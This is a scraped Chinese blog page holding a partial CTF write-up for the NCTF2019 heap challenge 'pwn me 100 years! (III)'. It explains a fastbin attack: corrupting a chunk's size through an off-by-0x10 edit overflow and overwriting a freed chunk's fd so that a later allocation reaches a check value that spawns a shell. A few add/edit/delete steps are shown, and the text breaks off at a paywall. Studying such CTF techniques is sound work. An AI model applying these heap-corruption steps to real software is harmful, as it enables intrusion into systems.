【Pwn】NCTF2019 pwn me 100 years! (Ⅲ)

最新推荐文章于 2022-12-20 22:09:53 发布
最新推荐文章于 2022-12-20 22:09:53 发布
阅读量8.1k 收藏
点赞数
分类专栏: pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/github_36788573/article/details/103293450
版权

main函数
在这里插入图片描述首先创建了一个0x10大小的堆块,最后如果这个堆块的值为0x66666666那么执行/bin/sh。那么想办法分配到这块内存空间即可。

看看中间的菜单,找到漏洞在edit函数中,read为固定的0x20个字节,由于最小堆块的大小是0x10,共享pre_size的8个字节,0x10和0x18分配的大小都是0x10字节,所以存在0x10个字节的溢出,但是0x10大小的字节只能覆盖到下一个chunk的size部分,不能直接修改掉fd部分,所以通过修改size进行下一步溢出。

首先分配4个chunk
add(16,‘aaaa’)#0
add(16,‘bbbb’)#1
add(16,‘cccc’)#2
add(16,‘dddd’)#3
内存变为
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----系统最开始分配的chunk
xxxxxxxxdeadbeef xxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk0
xxxxxxxxxxxxaaaa xxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk1
xxxxxxxxxxxxbbbb xxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk2
xxxxxxxxxxxxcccc xxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk3
xxxxxxxxxxxxdddd xxxxxxxxxxxxxxxx
接着将chunk3,chunk2 free掉
delete(3)
delete(2)
内存变为
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----系统最开始分配的chunk
xxxxxxxxdeadfeef xxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk0
xxxxxxxxxxxxaaaa xxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk1
xxxxxxxxxxxxbbbb xxxxxxxxxxxxxxxx
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk2
xxxxxxxxkkkkkkkk xxxxxxxxxxxxxxxx (这里chunk2在fastbin 链栈上了 fd指向chunk3,k表示chunk3地址)
xxxxxxxxxxxxxxxx xxxxxxxxxxxxxx21 <----chunk3
xxxxxxxxxxxx0000 xxxxxxxxxxxxxxxx
接着修改chunk0,覆盖chunk1的size。
edit(0,‘a’*0x18+p64(0x41)),chunk1大小变为0x41
free chunk1,那么chunk1就会被链到大小为0x30(去除头部0x10)的fastbin中去,那么接下来再malloc(0x30)就会将chunk1分配回来,且可以输入0x30大小的字符串于是就可以去覆盖chunk2的fd部分做fastbinattack了,动态调试发现堆地址最低字节是00,于是只要将chunk2的fd最低字节改为00即可。


                

                
                
        

        

    




        

            

                    
                      最低0.47元/天 解锁文章
                        
                    
            

        

    

      

        

            

              
                
                  不干正事的拖延症患者
                
              
            

            

                关注
              
            

        

        

          
    
            
  • 
              
                
                
                
                
                      0
                
              
              
    点赞
    
            
    • 
            
  • 
              
                
                
                
              
              
    
            
    • 
            
  • 
              
                
                
                
                
                    0
                
              
              
    
                
    
                  
                    收藏
                  
                
    
              
    
              
    
                
    
                  觉得还不错?
                  
                    一键收藏
                  
                 
                
    
              
    
            
    • 
          
  • 
            
    
              
              
            
    
              
              
              
                    0
              
            
            
    评论
    
          
    • 
          
  • 
          
    • 
          
  • 
            
              
            
              
    
            
              
                
            
    
          
    • 
        

      

      

            

                专栏目录
          










                



	

		

			

				
					
女人,男人与畜生

				
			

			

				

					开源权限管理中间件Ralasafe
				

				

					09-01
					
					5万+
					
				

			

		

		

			
				

听说企业老板将女人当作男人用,男人当作畜生用。
可见大家压力都很大。
 
如果,谁能让男人当女人用,女人当宠物用。。。  这个景象很和谐。
顺便也解决部分男女比例失调的问题
 
【引子: http://www.metadmin.com/blog/metadmincn/entry/woman_man_and_beast】
...

			
		

	



                

              
                



	

		

			

				
					
DBI接口与DPI接口与DSI接口

				
			

			

				

					dongzhichen的专栏
				

				

					01-04
					
					833
					
				

			

		

		

			
				
(1)DBI接口
       A,也就是通常所讲的MCU借口,俗称80 system接口。The lcd interface between host processor and LCM device list as below,The LCM driver will repeated update panel display。MCU借口通过并行接口传输控制命令和数据,并通过往LCM模组自带的

			
		

	



                


  
              

                


	

		

			

				
					
AM335x裸机<三>:watchdog的操作

				
			

			

				

					weixin_30586257的博客
				

				

					09-09
					
					878
					
				

			

		

		

			
				
基于第二篇,结合代码和TRM分析看门狗相关操作,直接上代码

HWREG(SOC_WDT_1_REGS + WDT_WSPR) = 0xAAAAu;
while(HWREG(SOC_WDT_1_REGS + WDT_WWPS) != 0x00);
HWREG(SOC_WDT_1_REGS + WDT_WSPR) = 0x5555u;
while(HWREG(SOC_WDT_1_...

			
		

	





	

		

			

				
					
02_UVaOJ_ AOAPC I_Beginning Algorithm Contests (Rujia Liu)_Volume0_Getting Started

					
热门推荐

				
			

			

				

					Neicole ~~ 学习旅程(大学)
				

				

					04-05
					
					29万+
					
				

			

		

		

			
				
刘汝佳白书推介(第01~04章相关UVaOJ题目练习)
Root :: AOAPC I: Beginning Algorithm Contests (Rujia Liu) :: Volume 0. Getting Started

内容包括:题目列表,相关题目的.cpp(题目,分析,代码)

题目难度参考于:http://www.cnblogs.com/devymex/archive/2

			
		

	



		

			
		



	

		

			

				
					
[解题报告]Machined Surfaces

				
			

			

				

					weixin_34344403的博客
				

				

					06-30
					
					1万+
					
				

			

		

		

			
				
题目大意
题目原文:http://uva.onlinejudge.org/external/4/414.pdf
背景
输入一个n代表下面有n行,当输入n时,结束程序,每行都有25个字符都以x开头和结尾,计算出 总的空格数 - 最少空格数*行数n

Sample Input(为了便于观看,下面的B代表空格)
4XXXXBBBBBBBBBBBBBBBBXXXXXXXXBBBBBB...

			
		

	





	

		

			

				
					
ciscn-2019-pwn

				
			

			

				

					11-29
				

			

		

		

			
				
【标题】"ciscn-2019-pwn"是一个与网络安全竞赛相关的主题,尤其聚焦于"Pwn"类别,这通常指的是破解或利用程序漏洞来获取系统控制权的挑战。2019年的CISCN(中国互联网安全大会)可能是这个挑战的背景,它是一个汇集...

			
		

	





	

		

			

				
					
pwn100题目文件及exp.zip

				
			

			

				

					08-09
				

			

		

		

			
				
本资源中的“pwn100”可能是一个初级级别的CTF(Capture The Flag)竞赛题目,旨在帮助学习者了解和实践栈溢出漏洞的利用技巧。  栈溢出是由于程序在分配的栈空间之外写入数据,导致栈上的其他变量或返回地址被覆盖...

			
		

	





	

		

			

				
					
baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛

				
			

			

				

					04-22
				

			

		

		

			
				
【标题】"baby_pwn ciscn 2019 第十二届全国大学生信息安全竞赛" 涉及的是一个信息安全竞赛中的题目,该比赛可能是针对参赛者在网络安全领域,特别是"pwn"类问题解决能力的挑战。"pwn"在黑客术语中通常指的是攻破或...

			
		

	





	

		

			

				
					
pwn ubuntu18的运行环境自己搭建

				
			

			

				

					11-15
				

			

		

		

			
				
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334

			
		

	





	

		

			

				
					
browser_pwn:浏览器pwn,现在主要工作

				
			

			

				

					03-22
				

			

		

		

			
				
浏览器Pwn,顾名思义,是指针对浏览器的安全攻防技术,主要集中在发现并利用浏览器中的漏洞进行攻击。在这个领域,V8_pwn 和 JSC_pwn 是两个关键的子领域,分别关注Google Chrome浏览器的V8 JavaScript引擎和Apple ...

			
		

	





	

		

			

				
					
xxxxxx

				
			

			

				

					02-14
				

			

		

		

			
				
xxxxxx

			
		

	





	

		

			

				
					
monkey-chunkey:wwwww

				
			

			

				

					03-22
				

			

		

		

			
				
猴子矮胖的应用程序
Monkey Chunky App旨在帮助早期读者练习阅读单词。 用户可以输入任何单词,应用程序会将其分解为语音块。 用户可以点击语音块,以听见组成单词的电话的相应声音。

			
		

	





	

		

			

				
					
arcgis 加载wmts服务

				
			

			

				

					Hhhh_cccc的博客
				

				

					06-03
					
					2564
					
				

			

		

		

			
				
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <title>简单加载一张图</title>
  <link type="text/css" rel="stylesheet" href="http://58.220.249.164:8084/arcgis_api/js/esri/css/esri.css"/>
  <...

			
		

	





	

		

			

				
					
闲来无事整一个蒙娜丽莎(ASCII Art)

					
最新发布

				
			

			

				

					ytk888的博客
				

				

					12-20
					
					1万+
					
				

			

		

		

			
				
【代码】闲来无事整一个蒙娜丽莎(ASCII Art)

			
		

	





	

		

			

				
					
nRF52832 — 连接指定name、UUID、addr的蓝牙设备

				
			

			

				

					文化人的博客
				

				

					03-14
					
					1万+
					
				

			

		

		

			
				
写在前面:近几年蓝牙发展迅速,蓝牙IC每年的出货量高达数亿颗,无论我们身处任何地方,周围都可能同时存在着很多种蓝牙设备。那么蓝牙主机如何能在众多的蓝牙广播信号中,与我们期望的从机,自动建立蓝牙连接呢?可以通过设备名称、通过uuid等等;下面我就以设备名称为例,说说如何根据蓝牙的device_name去建立蓝牙连接。

1、打开nRF52832的sdk,找到ble_app_multilink_central例程,在main.c文件中找到on_ble_evt(),然后找到BLE_GAP_EVT_ADV_REPO

			
		

	





	

		

			

				
					
HEAP: Free Heap block XXXX modified at XXXX after it was freed

				
			

			

				

					流云轩
				

				

					02-28
					
					2911
					
				

			

		

		

			
				
开发过程中,有时候会遇到堆异常的情况
HEAP: Free Heap block 39b998 modified at 39b9c0 after it was freed


			
		

	





	

		

			

				
					
高项中挣值计算公式

				
			

			

				

					Hhhh_cccc的博客
				

				

					06-03
					
					2890
					
				

			

		

		

			
				
PV: 计划完成的价值

EV:截止到检查点已经完成的价值

AC:实际的成本

CPI = AC/EV 成本绩效指标

SPI = PV/EV 进度绩效指标

CV = EV-AC 成本偏差 <0 (成本超支)

SV = EV-PV 进度偏差 <0  ( 进度滞后 )

ETC—完工尚需估计,即完成剩余工作所需的估算费用

EAC---完工时估算,即完成所有计划工作所需的估算

BAC---项目总预算,BAC=完工时的PV总和

典型模式下的完工估算:

ETC =...

			
		

	





	

		

			

				
					
二进制利用入门:Pwn挑战解析

				
			

			

				

					
				

			

		

		

			
				
"Introduction-to-Pwn.pdf - pwn学习手册"  在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...

			
		

	



              



  
“相关推荐”对你有帮助么?

  

      
    
          
  • 
              
    
                  
                  
              
    
              
    非常没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    没帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    一般
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    有帮助
    
          
    • 
          
  • 
              
    
                  
                  
              
    
              
    非常有帮助
    
          
    • 
      

      

      

          
          提交
      

      

  




          




        



    





    



      

      

        
      

      





	

		评论	
	

	
	




  

    

      添加红包
      
    

    

      

        
        

          
          
        

        
请填写红包祝福语或标题

      

      

        
        

          
          
        

        
红包个数最小为10个

      

      

        
        

          
          
        

        
红包金额最低5元

      

      

        
        

          当前余额3.43前往充值 >
        

      

      

        

          需支付:10.00

        
        
      

    

  





  

    
    
  

  

    
    
  








  

    

      

        

          

            
            
成就一亿技术人!

          

          

        

        

          

          

            领取后你会自动成为博主和红包主的粉丝
            规则
          

        

      

      

        

          

            
              
            
            

              
hope_wisdom
 发出的红包
            

          

        

        

          

          

          

        

      

    

    

  



      
      

      
实付

      
使用余额支付

      

        

          

            
            点击重新获取
          

        

        
扫码支付

      

      

        
          
            
          
          
        
      

      

        
        钱包余额
          0
          

            
            

              

                
抵扣说明:

                
 1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
 2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

              

            

          

      

      余额充值